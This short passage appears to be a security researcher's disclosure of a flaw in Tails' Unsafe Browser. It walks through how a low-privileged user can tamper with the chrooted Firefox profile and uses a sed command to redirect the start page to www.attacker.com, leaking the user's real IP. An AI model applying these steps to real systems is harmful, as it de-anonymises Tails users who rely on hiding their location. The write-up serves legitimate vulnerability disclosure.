Leak clear IP as low-privileged user amnesia
The Unsafe Browser is another chapter since it only can be executed via the sudo command. But the unsafe-browser script uses chroot. Yes, chroot is fine if you are in the chroot jail and want to break out, but it doesn't prevent me from influencing the jail from the host system. So the idea is the following:
- Attacker kills all running processes of /usr/local/lib/tor-browser/firefox.unsafe-browser.
- Attacker run the unsafe browser with sudo /usr/local/sbin/unsafe-browser.
- Attacker check for the unsafe browser firefox profile file permissions with
ls -la /var/lib/unsafe-browser/chroot/home/amnesia/.unsafe-browser/profile.default/user.js that have the following permissions # -rw-r--r-- 1 amnesia amnesia 3329 Mar 28 21:04 /var/lib/unsafe-browser/chroot/home/amnesia/.unsafe-browser/profile.default/user.js
- Attacker replaces the default start URL of the unsafe browser with his own by running
sed -i 's/\/usr\/share\/doc\/tails\/website\/misc\/unsafe_browser_warning.en.html/www.attacker.com/g' /var/lib/unsafe-browser/chroot/home/amnesia/.unsafe-browser/profile.default/user.js